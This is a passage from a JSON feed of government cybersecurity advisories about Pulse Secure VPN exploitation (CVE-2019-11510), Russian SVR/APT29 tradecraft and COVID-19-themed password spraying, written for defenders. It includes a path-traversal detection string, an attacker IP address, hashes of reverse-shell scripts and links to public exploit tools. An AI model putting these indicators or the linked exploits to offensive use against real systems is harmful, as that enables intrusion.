threat actor attempting to sell the stolen credentials after 30 unsuccessful attempts to connect to the customer environment to escalate privileges and drop ransomware. CISA has also observed this threat actor successfully dropping ransomware at hospitals and U.S. Government entities.\n\nIn other cases, CISA observed threat actors leveraging tools, such as LogMeIn and TeamViewer, for persistence. These tools would enable threat actors to maintain access to the victim\u2019s network environment if they lost their primary connection.\n\n### Initial Detection\n\nConventional antivirus and endpoint detection and response solutions did not detect this type of activity because the threat actors used legitimate credentials and remote services. \n\nAn intrusion detection system may have noticed the exploitation of CVE-2019-11510 if the sensor had visibility to the external interface of the VPN appliance (possible in a customer\u2019s demilitarized zone) and if appropriate rules were in place. Heuristics in centralized logging may have been able to detect logins from suspicious or foreign IPs, if configured.\n\n### Post-Compromise Detection and IOC Detection Tool\n\nGiven that organizations that have applied patches for CVE-2019-11510 may still be at risk for exploitation from compromises that occurred pre-patch, CISA developed detection methods for organizations to determine if their patched VPN appliances have been targeted by the activity revealed in this report.\n\nTo detect past exploitation of CVE-2019-11510, network administrators should:\n\n 1. Turn on unauthenticated log requests (see figure 5). (**Note:** there is a risk of overwriting logs with unauthenticated requests so, if enabling this feature, be sure to frequently back up logs; if possible, use a remote syslog server.) \n\n\n\n##### Figure 5: Checkbox that enables logging exploit attacks\n\n 2. Check logs for exploit attempts. To detect lateral movement, system administrators should look in the logs for strings such as` ../../../data `(see figure 6). \n\n\n\n##### Figure 6: Strings for detection of lateral movement\n\n 3. Manually review logs for unauthorized sessions and exploit attempts, especially sessions originating from unexpected geo-locations.\n 4. Run CISA\u2019s IOC detection tool. CISA developed a tool that enables administrators to triage logs (if authenticated request logging is turned on) and automatically search for IOCs associated with exploitation of CVE-2019-11510. CISA encourages administrators to visit [CISA\u2019s GitHub page](<https://github.com/cisagov/check-your-pulse>) to download and run the tool. While not exhaustive, this tool may find evidence of attempted compromise.\n\n### Indicators of Compromise\n\nCISA observed IP addresses making unauthorized connections to customer infrastructure. (**Note:** these IPs were observed as recently as February 15, 2020.) The IP addresses seen making unauthorized connections to customer infrastructure were different than IP addresses observed during initial exploitation. Please see the STIX file below for IPs.\n\nCISA observed the following user agents with this activity:\n\n * Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0\n * Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0\n * Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55[.]0.2883.87 Safari/537.36\n\nCISA also observed:\n\n * A cyber threat actor renaming portable executable (PE) files in an attempt to subvert application allow listing or antivirus (AV) protections. See table 1 for hashes of files used.\n * A threat actor \u201cliving off the land\u201d and utilizing C:\\Python\\ArcGIS to house malicious PE files, as well as using natively installed Python.\n * A threat actor attack infrastructure: 38.68.36(dot)112 port 9090 and 8088\n\n##### Table 1: Filenames and hashes of files used by a threat actor\n\nFilename | MD5 \n---|--- \nt.py (tied to scheduled task, python meterpreter reverse shell port 9090) | 5669b1fa6bd8082ffe306aa6e597d7f5 \ng.py (tied to scheduled task, python meterpreter reverse shell port 8088) | 61eebf58e892038db22a4d7c2ee65579 \n \nFor a downloadable copy of IOCs, see STIX file.\n\n### Mitigations\n\nCISA strongly urges organizations that have not yet done so to upgrade their Pulse Secure VPN to the corresponding patches for CVE-2019-11510. If\u2014after applying the detection measures in this alert\u2014organizations detect evidence of CVE-2019-11510 exploitation, CISA recommends changing passwords for all Active Directory accounts, including administrators and services accounts.\n\nCISA also recommends organizations to:\n\n * Look for unauthorized applications and scheduled tasks in their environment.\n * Remove any remote access programs not approved by the organization.\n * Remove any remote access trojans.\n * Carefully inspect scheduled tasks for scripts or executables that may allow an attacker to connect to an environment.\n\nIf organizations find evidence of malicious, suspicious, or anomalous activity or files, they should consider reimaging the workstation or server and redeploying back into the environment. CISA recommends performing checks to ensure the infection is gone even if the workstation or host has been reimaged.\n\n### Contact Information\n\nRecipients of this report are encouraged to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at\n\n * Phone: (888) 282-0870\n * Email: [CISAServiceDesk@cisa.dhs.gov](<mailto:CISAServiceDesk@cisa.dhs.gov>)\n\n### References\n\n[[1] Pulse Secure Advisory SA44101 ](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)\n\n[[2] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)\n\n[[3] Twitter. @XMPPwocky. (2019, August 23). Your least favorite construct ](<https://twitter.com/XMPPwocky/status/1164874297690611713/photo/1>)\n\n[[4] OpenSecurity Forums. Public vulnerability discussion. (2019, August 23). ](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848>)\n\n[[5] GitHub. BishopFox / pwn-pulse. ](<https://github.com/BishopFox/pwn-pulse/blob/master/pwn-pulse.sh>)\n\n[[6] File disclosure in Pulse Secure SSL VPN (Metasploit) ](<https://www.exploit-db.com/exploits/47297>)\n\n[[7] Twitter. @alyssa_herra ](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11>)\n\n[[8] OpenSecurity Forums. Public vulnerability discussion. (2019, August 23). ](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848>)\n\n[[9] OpenSecurity Forums. Public vulnerability discussion. (2019, August 31). ](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?tab=comments#comment-887>)\n\n[[10] Twitter. @alyssa_herra](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11>)\n\n### Revisions\n\nApril 16, 2020: Initial Version|October 23, 2020\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Continued Threat Actor Exploitation Post Pulse Secure VPN Patching", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2020-10-24T12:00:00", "id": "AA20-107A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-107a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-14T18:37:13", "description": "### Summary\n\nUnpatched Pulse Secure VPN servers continue to be an attractive target for malicious actors. Affected organizations that have not applied the software patch to fix an arbitrary file reading vulnerability, known as CVE-2019-11510, can become compromised in an attack. [[1]](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\nAlthough Pulse Secure [[2]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>) disclosed the vulnerability and provided software patches for the various affected products in April 2019, the Cybersecurity and Infrastructure Security Agency (CISA) continues to observe wide exploitation of CVE-2019-11510. [[3]](<https://www.kb.cert.org/vuls/id/927237/ >) [[4]](<https://www.us-cert.gov/ncas/current-activity/2019/07/26/vulnerabilities-multiple-vpn-applications >) [[5]](<https://www.us-cert.gov/ncas/current-activity/2019/10/16/multiple-vulnerabilities-pulse-secure-vpn>)\n\nCISA expects to see continued attacks exploiting unpatched Pulse Secure VPN environments and strongly urges users and administrators to upgrade to the corresponding fixes. [[6]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n## Timelines of Specific Events\n\n * April 24, 2019 \u2013 Pulse Secure releases initial advisory and software updates addressing multiple vulnerabilities.\n * May 28, 2019 \u2013 Large commercial vendors get reports of vulnerable VPN through HackerOne.\n * July 31, 2019 \u2013 Full use of exploit demonstrated using the admin session hash to get complete shell.\n * August 8, 2019 \u2013 Meh Chang and Orange Tsai demonstrate the VPN issues across multiple vendors (Pulse Secure) with detailed attack on active VPN exploitation.\n * August 24, 2019 \u2013 Bad Packets identifies over 14,500 vulnerable VPN servers globally still unpatched and in need of an upgrade.\n * October 7, 2019 \u2013 The National Security Agency (NSA) produces a Cybersecurity Advisory on Pulse Secure and other VPN products being targeted actively by advanced persistent threat actors.\n * October 16, 2019 \u2013 The CERT Coordination Center (CERT/CC) releases Vulnerability Note VU#927237: Pulse Secure VPN contains multiple vulnerabilities.\n * January 2020 \u2013 Media reports cybercriminals now targeting unpatched Pulse Secure VPN servers to install REvil (Sodinokibi) ransomware. \n\n### Technical Details\n\n## Impact\n\nA remote, unauthenticated attacker may be able to compromise a vulnerable VPN server. The attacker may be able to gain access to all active users and their plain-text credentials. It may also be possible for the attacker to execute arbitrary commands on each VPN client as it successfully connects to the VPN server.\n\nAffected versions:\n\n * Pulse Connect Secure 9.0R1 - 9.0R3.3\n * Pulse Connect Secure 8.3R1 - 8.3R7\n * Pulse Connect Secure 8.2R1 - 8.2R12\n * Pulse Connect Secure 8.1R1 - 8.1R15\n * Pulse Policy Secure 9.0R1 - 9.0R3.1\n * Pulse Policy Secure 5.4R1 - 5.4R7\n * Pulse Policy Secure 5.3R1 - 5.3R12\n * Pulse Policy Secure 5.2R1 - 5.2R12\n * Pulse Policy Secure 5.1R1 - 5.1R15\n\n### Mitigations\n\nThis vulnerability has no viable workarounds except for applying the patches provided by the vendor and performing required system updates.\n\nCISA strongly urges users and administrators to upgrade to the corresponding fixes. [[7]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n### References\n\n[[1] NIST NVD CVE-2019-11510 ](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\n[[2] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n[[3] CERT/CC Vulnerability Note VU#927237](<https://www.kb.cert.org/vuls/id/927237/>)\n\n[[4] CISA Current Activity Vulnerabilities in Multiple VPN Applications ](<https://www.us-cert.gov/ncas/current-activity/2019/07/26/vulnerabilities-multiple-vpn-applications>)\n\n[[5] CISA Current Activity Multiple Vulnerabilities in Pulse Secure VPN](<https://www.us-cert.gov/ncas/current-activity/2019/10/16/multiple-vulnerabilities-pulse-secure-vpn>)\n\n[[6] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n[[7] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n### Revisions\n\nJanuary 10, 2020: Initial Version|April 15, 2020: Revised to correct type of vulnerability\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-15T12:00:00", "type": "ics", "title": "Continued Exploitation of Pulse Secure VPN Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2020-04-15T12:00:00", "id": "AA20-010A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-010a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-14T18:32:15", "description": "### Summary\n\nThe Federal Bureau of Investigation (FBI), Department of Homeland Security (DHS), and Cybersecurity and Infrastructure Security Agency (CISA) assess Russian Foreign Intelligence Service (SVR) cyber actors\u2014also known as Advanced Persistent Threat 29 (APT 29), the Dukes, CozyBear, and Yttrium\u2014will continue to seek intelligence from U.S. and foreign entities through cyber exploitation, using a range of initial exploitation techniques that vary in sophistication, coupled with stealthy intrusion tradecraft within compromised networks. The SVR primarily targets government networks, think tank and policy analysis organizations, and information technology companies. On April 15, 2021, the White House released a statement on the recent SolarWinds compromise, attributing the activity to the SVR. For additional detailed information on identified vulnerabilities and mitigations, see the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and FBI Cybersecurity Advisory titled \u201cRussian SVR Targets U.S. and Allied Networks,\u201d released on April 15, 2021.\n\nThe FBI and DHS are providing information on the SVR\u2019s cyber tools, targets, techniques, and capabilities to aid organizations in conducting their own investigations and securing their networks.\n\nClick here for a PDF version of this report.\n\n### Threat Overview\n\nSVR cyber operations have posed a longstanding threat to the United States. Prior to 2018, several private cyber security companies published reports about APT 29 operations to obtain access to victim networks and steal information, highlighting the use of customized tools to maximize stealth inside victim networks and APT 29 actors\u2019 ability to move within victim environments undetected.\n\nBeginning in 2018, the FBI observed the SVR shift from using malware on victim networks to targeting cloud resources, particularly e-mail, to obtain information. The exploitation of Microsoft Office 365 environments following network access gained through use of modified SolarWinds software reflects this continuing trend. Targeting cloud resources probably reduces the likelihood of detection by using compromised accounts or system misconfigurations to blend in with normal or unmonitored traffic in an environment not well defended, monitored, or understood by victim organizations.\n\n### Technical Details\n\n### SVR Cyber Operations Tactics, Techniques, and Procedures\n\n### Password Spraying\n\nIn one 2018 compromise of a large network, SVR cyber actors used password spraying to identify a weak password associated with an administrative account. The actors conducted the password spraying activity in a \u201clow and slow\u201d manner, attempting a small number of passwords at infrequent intervals, possibly to avoid detection. The password spraying used a large number of IP addresses all located in the same country as the victim, including those associated with residential, commercial, mobile, and The Onion Router (TOR) addresses.\n\nThe organization unintentionally exempted the compromised administrator\u2019s account from multi-factor authentication requirements. With access to the administrative account, the actors modified permissions of specific e-mail accounts on the network, allowing any authenticated network user to read those accounts.\n\nThe actors also used the misconfiguration for compromised non-administrative accounts. That misconfiguration enabled logins using legacy single-factor authentication on devices which did not support multi-factor authentication. The FBI suspects this was achieved by spoofing user agent strings to appear to be older versions of mail clients, including Apple\u2019s mail client and old versions of Microsoft Outlook. After logging in as a non-administrative user, the actors used the permission changes applied by the compromised administrative user to access specific mailboxes of interest within the victim organization.\n\nWhile the password sprays were conducted from many different IP addresses, once the actors obtained access to an account, that compromised account was generally only accessed from a single IP address corresponding to a leased virtual private server (VPS). The FBI observed minimal overlap between the VPSs used for different compromised accounts, and each leased server used to conduct follow-on actions was in the same country as the victim organization.\n\nDuring the period of their access, the actors consistently logged into the administrative account to modify account permissions, including removing their access to accounts presumed to no longer be of interest, or adding permissions to additional accounts. \n\n#### _**Recommendations**_\n\nTo defend from this technique, the FBI and DHS recommend network operators to follow best practices for configuring access to cloud computing environments, including:\n\n * Mandatory use of an approved multi-factor authentication solution for all users from both on premises and remote locations.\n * Prohibit remote access to administrative functions and resources from IP addresses and systems not owned by the organization.\n * Regular audits of mailbox settings, account permissions, and mail forwarding rules for evidence of unauthorized changes.\n * Where possible, enforce the use of strong passwords and prevent the use of easily guessed or commonly used passwords through technical means, especially for administrative accounts.\n * Regularly review the organization\u2019s password management program.\n * Ensure the organization\u2019s information technology (IT) support team has well-documented standard operating procedures for password resets of user account lockouts.\n * Maintain a regular cadence of security awareness training for all company employees.\n\n### Leveraging Zero-Day Vulnerability\n\nIn a separate incident, SVR actors used CVE-2019-19781, a zero-day exploit at the time, against a virtual private network (VPN) appliance to obtain network access. Following exploitation of the device in a way that exposed user credentials, the actors identified and authenticated to systems on the network using the exposed credentials.\n\nThe actors worked to establish a foothold on several different systems that were not configured to require multi-factor authentication and attempted to access web-based resources in specific areas of the network in line with information of interest to a foreign intelligence service.\n\nFollowing initial discovery, the victim attempted to evict the actors. However, the victim had not identified the initial point of access, and the actors used the same VPN appliance vulnerability to regain access. Eventually, the initial access point was identified, removed from the network, and the actors were evicted. As in the previous case, the actors used dedicated VPSs located in the same country as the victim, probably to make it appear that the network traffic was not anomalous with normal activity.\n\n#### **_Recommendations_**\n\nTo defend from this technique, the FBI and DHS recommend network defenders ensure endpoint monitoring solutions are configured to identify evidence of lateral movement within the network and:\n\n * Monitor the network for evidence of encoded PowerShell commands and execution of network scanning tools, such as NMAP.\n * Ensure host based anti-virus/endpoint monitoring solutions are enabled and set to alert if monitoring or reporting is disabled, or if communication is lost with a host agent for more than a reasonable amount of time.\n * Require use of multi-factor authentication to access internal systems.\n * Immediately configure newly-added systems to the network, including those used for testing or development work, to follow the organization\u2019s security baseline and incorporate into enterprise monitoring tools.\n\n### WELLMESS Malware\n\nIn 2020, the governments of the United Kingdom, Canada, and the United States attributed intrusions perpetrated using malware known as WELLMESS to APT 29. WELLMESS was written in the Go programming language, and the previously-identified activity appeared to focus on targeting COVID-19 vaccine development. The FBI\u2019s investigation revealed that following initial compromise of a network\u2014normally through an unpatched, publicly-known vulnerability\u2014the actors deployed WELLMESS. Once on the network, the actors targeted each organization\u2019s vaccine research repository and Active Directory servers. These intrusions, which mostly relied on targeting on-premises network resources, were a departure from historic tradecraft, and likely indicate new ways the actors are evolving in the virtual environment. More information about the specifics of the malware used in this intrusion have been previously released and are referenced in the \u2018Resources\u2019 section of this document.\n\n### Tradecraft Similarities of SolarWinds-enabled Intrusions\n\nDuring the spring and summer of 2020, using modified SolarWinds network monitoring software as an initial intrusion vector, SVR cyber operators began to expand their access to numerous networks. The SVR\u2019s modification and use of trusted SolarWinds products as an intrusion vector is also a notable departure from the SVR\u2019s historic tradecraft.\n\nThe FBI\u2019s initial findings indicate similar post-infection tradecraft with other SVR-sponsored intrusions, including how the actors purchased and managed infrastructure used in the intrusions. After obtaining access to victim networks, SVR cyber actors moved through the networks to obtain access to e-mail accounts. Targeted accounts at multiple victim organizations included accounts associated with IT staff. The FBI suspects the actors monitored IT staff to collect useful information about the victim networks, determine if victims had detected the intrusions, and evade eviction actions.\n\n#### **_Recommendations_**\n\nAlthough defending a network from a compromise of trusted software is difficult, some organizations successfully detected and prevented follow-on exploitation activity from the initial malicious SolarWinds software. This was achieved using a variety of monitoring techniques including:\n\n * Auditing log files to identify attempts to access privileged certificates and creation of fake identify providers.\n * Deploying software to identify suspicious behavior on systems, including the execution of encoded PowerShell.\n * Deploying endpoint protection systems with the ability to monitor for behavioral indicators of compromise.\n * Using available public resources to identify credential abuse within cloud environments.\n * Configuring authentication mechanisms to confirm certain user activities on systems, including registering new devices.\n\nWhile few victim organizations were able to identify the initial access vector as SolarWinds software, some were able to correlate different alerts to identify unauthorized activity. The FBI and DHS believe those indicators, coupled with stronger network segmentation (particularly \u201czero trust\u201d architectures or limited trust between identity providers) and log correlation, can enable network defenders to identify suspicious activity requiring additional investigation.\n\n### General Tradecraft Observations\n\nSVR cyber operators are capable adversaries. In addition to the techniques described above, FBI investigations have revealed infrastructure used in the intrusions is frequently obtained using false identities and cryptocurrencies. VPS infrastructure is often procured from a network of VPS resellers. These false identities are usually supported by low reputation infrastructure including temporary e-mail accounts and temporary voice over internet protocol (VoIP) telephone numbers. While not exclusively used by SVR cyber actors, a number of SVR cyber personas use e-mail services hosted on cock[.]li or related domains.\n\nThe FBI also notes SVR cyber operators have used open source or commercially available tools continuously, including Mimikatz\u2014an open source credential-dumping too\u2014and Cobalt Strike\u2014a commercially available exploitation tool.\n\n### Mitigations\n\nThe FBI and DHS recommend service providers strengthen their user validation and verification systems to prohibit misuse of their services.\n\n### Resources\n\n * NSA, CISA, FBI [Joint Cybersecurity Advisory: Russian SVR Targets U.S. and Allied Networks](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>)\n * CISA: [Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise ](<https://us-cert.cisa.gov/remediating-apt-compromised-networks>)\n * CISA [Alert AA21-008A: Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>)\n * FBI, CISA, ODNI, NSA Joint Statement: [Joint Statement by the Federal Bureau of Investigation, the Cybersecurity and Infrastructure Security Agency, the Office of the Director of National Intelligence (ODNI), and the National Security Agency](<https://www.odni.gov/index.php/newsroom/press-releases/press-releases-2021/item/2176-joint-statement-by-the-federal-bureau-of-investigation-fbi-the-cybersecurity-and-infrastructure-security-agency-cisa-the-office-of-the-director-of-national-intelligence-odni-and-the-national-security-agency-nsa>)\n * CISA Alert [AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-352a>)\n * [CISA Insights: What Every Leader Needs to Know about the Ongoing APT Cyber Activity](<https://www.cisa.gov/sites/default/files/publications/CISA Insights - What Every Leader Needs to Know About the Ongoing APT Cyber Activity - FINAL_508.pdf>)\n * FBI, CISA [Joint Cybersecurity Advisory: Advanced Persistent Threat Actors Targeting U.S. Think Tanks](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-336A-APT_Actors_Targeting_US_ThinkTanks.pdf>)\n * CISA: [Malicious Activity Targeting COVID-19 Research, Vaccine Development ](<https://us-cert.cisa.gov/ncas/current-activity/2020/07/16/malicious-activity-targeting-covid-19-research-vaccine-development>)\n * NCSC, CSE, NSA, CISA Advisory: [APT 29 targets COVID-19 vaccine development](<https://media.defense.gov/2020/Jul/16/2002457639/-1/-1/0/NCSC_APT29_ADVISORY-QUAD-OFFICIAL-20200709-1810.PDF>)\n\n### Revisions\n\nApril 26, 2021: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-26T12:00:00", "type": "ics", "title": "Russian Foreign Intelligence Service (SVR) Cyber Operations: Trends and Best Practices for Network Defenders", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-04-26T12:00:00", "id": "AA21-116A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-116a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-14T18:35:54", "description": "### Summary\n\n**This is a joint alert from the United States Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom\u2019s National Cyber Security Centre (NCSC).**\n\nCISA and NCSC continue to see indications that advanced persistent threat (APT) groups are exploiting the Coronavirus Disease 2019 (COVID-19) pandemic as part of their cyber operations. This joint alert highlights ongoing activity by APT groups against organizations involved in both national and international COVID-19 responses. It describes some of the methods these actors are using to target organizations and provides mitigation advice.\n\nThe joint CISA-NCSC [Alert: (AA20-099A) COVID-19 Exploited by Malicious Cyber Actors](<https://www.us-cert.gov/ncas/alerts/aa20-099a>) from April 8, 2020, previously detailed the exploitation of the COVID-19 pandemic by cybercriminals and APT groups. This joint CISA-NCSC Alert provides an update to ongoing malicious cyber activity relating to COVID-19. For a graphical summary of CISA\u2019s joint COVID-19 Alerts with NCSC, see the following [guide](<https://cisa.gov/sites/default/files/publications/Joint_CISA_UK_Tip-COVID-19_Cyber_Threat_Exploitation_S508C.pdf>).\n\n### COVID-19-related targeting\n\nAPT actors are actively targeting organizations involved in both national and international COVID-19 responses. These organizations include healthcare bodies, pharmaceutical companies, academia, medical research organizations, and local governments.\n\nAPT actors frequently target organizations in order to collect bulk personal information, intellectual property, and intelligence that aligns with national priorities.\n\nThe pandemic has likely raised additional interest for APT actors to gather information related to COVID-19. For example, actors may seek to obtain intelligence on national and international healthcare policy, or acquire sensitive data on COVID-19-related research.\n\n### Targeting of pharmaceutical and research organizations\n\nCISA and NCSC are currently investigating a number of incidents in which threat actors are targeting pharmaceutical companies, medical research organizations, and universities. APT groups frequently target such organizations in order to steal sensitive research data and intellectual property for commercial and state benefit. Organizations involved in COVID-19-related research are attractive targets for APT actors looking to obtain information for their domestic research efforts into COVID-19-related medicine.\n\nThese organizations\u2019 global reach and international supply chains increase exposure to malicious cyber actors. Actors view supply chains as a weak link that they can exploit to obtain access to better-protected targets. Many supply chain elements have also been affected by the shift to remote working and the new vulnerabilities that have resulted.\n\nRecently CISA and NCSC have seen APT actors scanning the external websites of targeted companies and looking for vulnerabilities in unpatched software. Actors are known to take advantage of Citrix vulnerability CVE-2019-19781[[1]](<https://www.us-cert.gov/ncas/alerts/aa20-031a>),[[2]](<https://www.ncsc.gov.uk/news/citrix-alert>) and vulnerabilities in virtual private network (VPN) products from Pulse Secure, Fortinet, and Palo Alto.[[3]](<https://www.us-cert.gov/ncas/alerts/aa20-010a>),[[4]](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\n### COVID-19-related password spraying activity\n\nCISA and NCSC are actively investigating large-scale password spraying campaigns conducted by APT groups. These actors are using this type of attack to target healthcare entities in a number of countries\u2014including the United Kingdom and the United States\u2014as well as international healthcare organizations.\n\nPreviously, APT groups have used password spraying to target a range of organizations and companies across sectors\u2014including government, emergency services, law enforcement, academia and research organizations, financial institutions, and telecommunications and retail companies.\n\n### Technical Details\n\n[Password spraying](<https://www.ncsc.gov.uk/blog-post/spray-you-spray-me-defending-against-password-spraying-attacks>) is a commonly used style of brute force attack in which the attacker tries a single and commonly used password against many accounts before moving on to try a second password, and so on. This technique allows the attacker to remain undetected by avoiding rapid or frequent account lockouts. These attacks are successful because, for any given large set of users, there will likely be some with common passwords.\n\nMalicious cyber actors, including APT groups, collate names from various online sources that provide organizational details and use this information to identify possible accounts for targeted institutions. The actors will then \u201cspray\u201d the identified accounts with lists of commonly used passwords.\n\nOnce the malicious cyber actor compromises a single account, they will use it to access other accounts where the credentials are reused. Additionally, the actor could attempt to move laterally across the network to steal additional data and implement further attacks against other accounts within the network.\n\nIn previous incidents investigated by CISA and NCSC, malicious cyber actors used password spraying to compromise email accounts in an organization and then, in turn, used these accounts to download the victim organization\u2019s Global Address List (GAL). The actors then used the GAL to password spray further accounts.\n\nNCSC has previously provided [examples of frequently found passwords](<https://www.ncsc.gov.uk/blog-post/passwords-passwords-everywhere>), which attackers are known to use in password spray attacks to attempt to gain access to corporate accounts and networks. In these attacks, malicious cyber actors often use passwords based on the month of the year, seasons, and the name of the company or organization.\n\nCISA and NCSC continue to investigate activity linked to large-scale password spraying campaigns. APT actors will continue to exploit COVID-19 as they seek to answer additional intelligence questions relating to the pandemic. CISA and NCSC advise organizations to follow the mitigation advice below in view of this heightened activity.\n\n### Mitigations\n\nCISA and NCSC have previously published information for organizations on password spraying and improving password policy. Putting this into practice will significantly reduce the chance of compromise from this kind of attack.\n\n * [CISA alert on password spraying attacks](<https://www.us-cert.gov/ncas/alerts/TA18-086A>)\n * [CISA guidance on choosing and protecting passwords](<https://www.us-cert.gov/ncas/tips/ST04-002>)\n * [CISA guidance on supplementing passwords](<https://www.us-cert.gov/ncas/tips/ST05-012>)\n * [NCSC guidance on password spraying attacks](<https://www.ncsc.gov.uk/blog-post/spray-you-spray-me-defending-against-password-spraying-attacks>)\n * [NCSC guidance on password administration for system owners](<https://www.ncsc.gov.uk/collection/passwords>)\n * [NCSC guidance on password deny lists](<https://www.ncsc.gov.uk/blog-post/passwords-passwords-everywhere>)\n\nCISA\u2019s [Cyber Essentials](<https://www.cisa.gov/sites/default/files/publications/19_1106_cisa_CISA_Cyber_Essentials_S508C_0.pdf>) for small organizations provides guiding principles for leaders to develop a culture of security and specific actions for IT professionals to put that culture into action. Additionally, the UK government\u2019s [Cyber Aware](<https://www.ncsc.gov.uk/cyberaware/home>) campaign provides useful advice for individuals on how to stay secure online during the coronavirus pandemic. This includes advice on protecting passwords, accounts, and devices.\n\nA number of other mitigations will be of use in defending against the campaigns detailed in this report:\n\n * **Update VPNs, network infrastructure devices, and devices being used to remote into work environments with the latest software patches and configurations. **See CISA\u2019s [guidance on enterprise VPN security](<https://www.us-cert.gov/ncas/alerts/aa20-073a>) and NCSC [guidance on virtual private 